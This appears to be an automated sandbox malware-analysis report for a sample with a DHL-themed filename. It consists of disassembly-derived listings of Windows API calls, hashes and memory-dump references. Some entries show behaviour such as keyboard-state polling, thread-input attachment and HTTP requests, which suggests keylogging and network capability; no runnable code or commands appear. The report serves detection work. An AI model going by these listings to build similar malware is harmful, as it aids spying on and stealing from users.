                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 2762341140-0
                                                                                      • Opcode ID: 0956522ee2a1d255a9b1ec35de15713414ef047bd54bd57140b8e33685ab8d7f
                                                                                      • Instruction ID: 73cb12350039057650bf679d3b36b15a0ce8277bca33355043ee7866d4c11481
                                                                                      • Opcode Fuzzy Hash: 0956522ee2a1d255a9b1ec35de15713414ef047bd54bd57140b8e33685ab8d7f
                                                                                      • Instruction Fuzzy Hash: 81C13B75A04109AFDB14DFA4C884DAEBBF9FF49314F148498F81A9B262DB31ED45CB90
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0008FAAF
• SafeArrayAllocData.OLEAUT32(?), ref: 0008FB08
• VariantInit.OLEAUT32(?), ref: 0008FB1A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 0008FB3A
• VariantCopy.OLEAUT32(?,?), ref: 0008FB8D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 0008FBA1
• VariantClear.OLEAUT32(?), ref: 0008FBB6
• SafeArrayDestroyData.OLEAUT32(?), ref: 0008FBC3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0008FBCC
• VariantClear.OLEAUT32(?), ref: 0008FBDE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0008FBE9
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 1b52f1615432dba465ea42c7bdcc95dfc96772479f8e16173509e7da9638bb73
• Instruction ID: a97e2194223989f645a9aca7e3259a2aca0b4c129962010ce1b50839bd08a709
• Opcode Fuzzy Hash: 1b52f1615432dba465ea42c7bdcc95dfc96772479f8e16173509e7da9638bb73
• Instruction Fuzzy Hash: A3414075A0021A9FEB04EF64C854DFEBBB9FF48354F008069E94AA7261DB74A945CF90
APIs
• GetKeyboardState.USER32(?), ref: 00099CA1
• GetAsyncKeyState.USER32(000000A0), ref: 00099D22
• GetKeyState.USER32(000000A0), ref: 00099D3D
• GetAsyncKeyState.USER32(000000A1), ref: 00099D57
• GetKeyState.USER32(000000A1), ref: 00099D6C
• GetAsyncKeyState.USER32(00000011), ref: 00099D84
• GetKeyState.USER32(00000011), ref: 00099D96
• GetAsyncKeyState.USER32(00000012), ref: 00099DAE
• GetKeyState.USER32(00000012), ref: 00099DC0
• GetAsyncKeyState.USER32(0000005B), ref: 00099DD8
• GetKeyState.USER32(0000005B), ref: 00099DEA
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: f149451a9e4a68ea03f1a538d7f5f1475838c0241219f06aa78dac18e236bcbb
• Instruction ID: 8395430a7d9abd82758272c9ee139d26679bb37e314f5df6033502a2c8c37088
• Opcode Fuzzy Hash: f149451a9e4a68ea03f1a538d7f5f1475838c0241219f06aa78dac18e236bcbb
• Instruction Fuzzy Hash: 60412A70505BC96DFFB087A8C8447B5BEE06F12344F08805EDAC6565C2EBE59DC8D7A2
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 000B05BC
• inet_addr.WSOCK32(?), ref: 000B061C
• gethostbyname.WSOCK32(?), ref: 000B0628
• IcmpCreateFile.IPHLPAPI ref: 000B0636
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 000B06C6
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 000B06E5
• IcmpCloseHandle.IPHLPAPI(?), ref: 000B07B9
• WSACleanup.WSOCK32 ref: 000B07BF
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: 5ba3ee1f2dc9e9241cfba9b895ee04e7c8eba1342c03bb2ddb0ca0f591be4783
• Instruction ID: 7ce1caf11426689a9e9e45dfbddc4ec291889288772abec49b16a563077bf483
• Opcode Fuzzy Hash: 5ba3ee1f2dc9e9241cfba9b895ee04e7c8eba1342c03bb2ddb0ca0f591be4783
• Instruction Fuzzy Hash: F5918E75A086019FD320CF15C888F5BBBE4EF84318F1485A9F4698B6A2CB34ED45CF91
APIs
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: _wcslen$BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 707087890-567219261
• Opcode ID: a9ed6dc3086c4a97938f4513d96c98ec5ae6795f06965579ade3c838a506fef8
• Instruction ID: 0d4d7337f921ac23cd4219ae1e1ab9611e883a0ca561204241412b627afecf51
• Opcode Fuzzy Hash: a9ed6dc3086c4a97938f4513d96c98ec5ae6795f06965579ade3c838a506fef8
• Instruction Fuzzy Hash: CE51B131A041169BCF24DF68C9519FEB7E9BF64324B21822AE926E72D5DF31DD40C790
APIs
• CoInitialize.OLE32 ref: 000B3774
• CoUninitialize.OLE32 ref: 000B377F
• CoCreateInstance.OLE32(?,00000000,00000017,000CFB78,?), ref: 000B37D9
• IIDFromString.OLE32(?,?), ref: 000B384C
• VariantInit.OLEAUT32(?), ref: 000B38E4
• VariantClear.OLEAUT32(?), ref: 000B3936
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 636576611-1287834457
• Opcode ID: 0112f97aef9a5cc8c0cf0b690918559dc0106e319501bb52f651b7977a454376
• Instruction ID: 626913a9bfbe5f21e2d1492cf5d289d7a788ed92f3803b082cfa81f78115d974
• Opcode Fuzzy Hash: 0112f97aef9a5cc8c0cf0b690918559dc0106e319501bb52f651b7977a454376
• Instruction Fuzzy Hash: 446190B1608711AFD721DF54C889FAEB7E8EF49710F204819F5859B291DB70EE48CB92
APIs
  • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
  • Part of subcall function 0004912D: GetCursorPos.USER32(?), ref: 00049141
  • Part of subcall function 0004912D: ScreenToClient.USER32(00000000,?), ref: 0004915E
  • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000001), ref: 00049183
  • Part of subcall function 0004912D: GetAsyncKeyState.USER32(00000002), ref: 0004919D
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 000C8B6B
• ImageList_EndDrag.COMCTL32 ref: 000C8B71
• ReleaseCapture.USER32 ref: 000C8B77
• SetWindowTextW.USER32(?,00000000), ref: 000C8C12
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 000C8C25
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 000C8CFF
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID$p]
• API String ID: 1924731296-2901959936
• Opcode ID: 70d9860e6951f6460a9bf4807396839e5b28c9f76a015ecda60774ca38e5da5b
• Instruction ID: 5e1dfe9bfd51562a1d7af3c8c0aeb259a0ee0f54fab25b2dca99447a9619759e
• Opcode Fuzzy Hash: 70d9860e6951f6460a9bf4807396839e5b28c9f76a015ecda60774ca38e5da5b
• Instruction Fuzzy Hash: E1514971104304AFE704DF24D996FAE77E4FB88714F400A2DF996A72E2DBB49944CB62
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 000A33CF
  • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 000A33F0
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: LoadString$_wcslen
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
• API String ID: 4099089115-3080491070
• Opcode ID: 72b526be7a055226e21fc3841c32950984e97fe62f0608dd5309c18fb97cba31
• Instruction ID: f1496586ec337dbdcd529c3b64e392e7141f15e77337846516c837ee56053849
• Opcode Fuzzy Hash: 72b526be7a055226e21fc3841c32950984e97fe62f0608dd5309c18fb97cba31
• Instruction Fuzzy Hash: 5A517C71D00209BADF16EBE4CD46EEEB7B8AF05340F104165F605760A2EB752F98DB61
APIs
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: APPEND$EXISTS$KEYS$REMOVE
• API String ID: 1256254125-769500911
• Opcode ID: 316413cb8cc671821179b09e6cbb014a7acacc6bffa2c908cc45652922724596
• Instruction ID: d5867ef3fc190abdd571cf2aa017a74bcb2c4e47defc9fa5d5652e14097cbf31
• Opcode Fuzzy Hash: 316413cb8cc671821179b09e6cbb014a7acacc6bffa2c908cc45652922724596
• Instruction Fuzzy Hash: 4A412B32A041269BCF206F7DDE905BEB7E5AFA0774B244229E421D7280E739DC81E390
APIs
• SetErrorMode.KERNEL32(00000001), ref: 000A53A0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 000A5416
• GetLastError.KERNEL32 ref: 000A5420
• SetErrorMode.KERNEL32(00000000,READY), ref: 000A54A7
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
APIs
• GetCurrentThreadId.KERNEL32 ref: 0009B151
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B165
• GetWindowThreadProcessId.USER32(00000000), ref: 0009B16C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B17B
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0009B18D
• AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B1A6
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B1B8
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B1FD
• AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B212
• AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0009A1E1,?,00000001), ref: 0009B21D
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
APIs
• _free.LIBCMT ref: 00062C94
  • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
  • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
• _free.LIBCMT ref: 00062CA0
• _free.LIBCMT ref: 00062CAB
• _free.LIBCMT ref: 00062CB6
• _free.LIBCMT ref: 00062CC1
• _free.LIBCMT ref: 00062CCC
• _free.LIBCMT ref: 00062CD7
• _free.LIBCMT ref: 00062CE2
• _free.LIBCMT ref: 00062CED
• _free.LIBCMT ref: 00062CFB
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00031459
• OleUninitialize.OLE32(?,00000000), ref: 000314F8
• UnregisterHotKey.USER32(?), ref: 000316DD
• DestroyWindow.USER32(?), ref: 000724B9
• FreeLibrary.KERNEL32(?), ref: 0007251E
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 0007254B
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000A7FAD
• SetCurrentDirectoryW.KERNEL32(?), ref: 000A7FC1
• GetFileAttributesW.KERNEL32(?), ref: 000A7FEB
• SetFileAttributesW.KERNEL32(?,00000000), ref: 000A8005
• SetCurrentDirectoryW.KERNEL32(?), ref: 000A8017
• SetCurrentDirectoryW.KERNEL32(?), ref: 000A8060
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000A80B0
Similarity
• API ID: CurrentDirectory$AttributesFile
• String ID: *.*
• API String ID: 769691225-438819550
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00035C7A
  • Part of subcall function 00035D0A: GetClientRect.USER32(?,?), ref: 00035D30
  • Part of subcall function 00035D0A: GetWindowRect.USER32(?,?), ref: 00035D71
  • Part of subcall function 00035D0A: ScreenToClient.USER32(?,?), ref: 00035D99
• GetDC.USER32 ref: 000746F5
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00074708
• SelectObject.GDI32(00000000,00000000), ref: 00074716
• SelectObject.GDI32(00000000,00000000), ref: 0007472B
• ReleaseDC.USER32(?,00000000), ref: 00074733
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000747C4
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
APIs
• LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 000A35E4
  • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
• LoadStringW.USER32(00102390,?,00000FFF,?), ref: 000A360A
Similarity
• API ID: LoadString$_wcslen
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 4099089115-2391861430
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000C2E1C
• GetWindowLongW.USER32(00000000,000000F0), ref: 000C2E4F
• GetWindowLongW.USER32(00000000,000000F0), ref: 000C2E84
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 000C2EB6
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 000C2EE0
• GetWindowLongW.USER32(00000000,000000F0), ref: 000C2EF1
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000C2F0B
Similarity
• API ID: LongWindow$MessageSend
• String ID: p]
• API String ID: 2178440468-1923361398
                                                                                      APIs
                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000AC272
                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000AC29A
                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000AC2CA
                                                                                      • GetLastError.KERNEL32 ref: 000AC322
                                                                                      • SetEvent.KERNEL32(?), ref: 000AC336
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 000AC341
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                      • String ID:
                                                                                      • API String ID: 3113390036-3916222277
                                                                                      • Opcode ID: f60c3c1cfd8f59c054cb2cfcac2b7c68ad2f581e155bf8fa0e3c816f3ef7c0e4
                                                                                      • Instruction ID: eabc88df7c123f4bff00898a0ba863c7d2f8aec66835cf218a385abb8559e2b1
                                                                                      • Opcode Fuzzy Hash: f60c3c1cfd8f59c054cb2cfcac2b7c68ad2f581e155bf8fa0e3c816f3ef7c0e4
                                                                                      • Instruction Fuzzy Hash: 60317FB2504604AFFB219FA4CC88EAB7BFCEB4A744F15851EF44AD6201DB34DE059B60
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00073AAF,?,?,Bad directive syntax error,000CCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 000998BC
                                                                                      • LoadStringW.USER32(00000000,?,00073AAF,?), ref: 000998C3
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00099987
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                      • API String ID: 858772685-4153970271
                                                                                      • Opcode ID: a40d99266a86a25b4a17446ef30ddc9027e11f67eb4a331e607e2c257ba57892
                                                                                      • Instruction ID: e4d4b2ba0b96a9902762ca0244648191305d79230c6f3da5b4bd9ef137bff797
                                                                                      • Opcode Fuzzy Hash: a40d99266a86a25b4a17446ef30ddc9027e11f67eb4a331e607e2c257ba57892
                                                                                      • Instruction Fuzzy Hash: 59215E3184021EABDF16AF94CC46EEE7779FF18300F044469F619660A2EB75AA18EB50
                                                                                      APIs
                                                                                      • GetParent.USER32 ref: 000920AB
                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 000920C0
                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0009214D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameParentSend
                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                      • API String ID: 1290815626-3381328864
                                                                                      • Opcode ID: 3eb35731134b9866e10559de4ba1b8161ee020c148a2b9b32e6f1da96e44c64a
                                                                                      • Instruction ID: 9e3ed4af8df75a74c266fd6f48926b3993a564105d3bb350367ec8d50b8ef90f
                                                                                      • Opcode Fuzzy Hash: 3eb35731134b9866e10559de4ba1b8161ee020c148a2b9b32e6f1da96e44c64a
                                                                                      • Instruction Fuzzy Hash: 7F11EC7A688706BAFE116720DC07DFB37DCDB15726F200116FB04A90E2FFA558557614
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9ee3ca9e03840b01c7f71f2bc98c8a309733d74a6c86b6862fcb4c218ff386c1
                                                                                      • Instruction ID: 64925fcf7e326d840ddc240013e141eac246c497ad2e8fe0d16f71647c6cfce6
                                                                                      • Opcode Fuzzy Hash: 9ee3ca9e03840b01c7f71f2bc98c8a309733d74a6c86b6862fcb4c218ff386c1
                                                                                      • Instruction Fuzzy Hash: 14C10474D04249AFEF21DFA8C845BEDBBF6AF09310F044199E855A7392CB748D41CB60
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                      • String ID:
                                                                                      • API String ID: 1282221369-0
                                                                                      • Opcode ID: 772fa45dd3188dc4a5f852cd547726591804bd8783e8427523d7b23ffddb4862
                                                                                      • Instruction ID: 1741abb00b9734ea0f05e2114653837793e1eb24416a971899a8c3c5766010e0
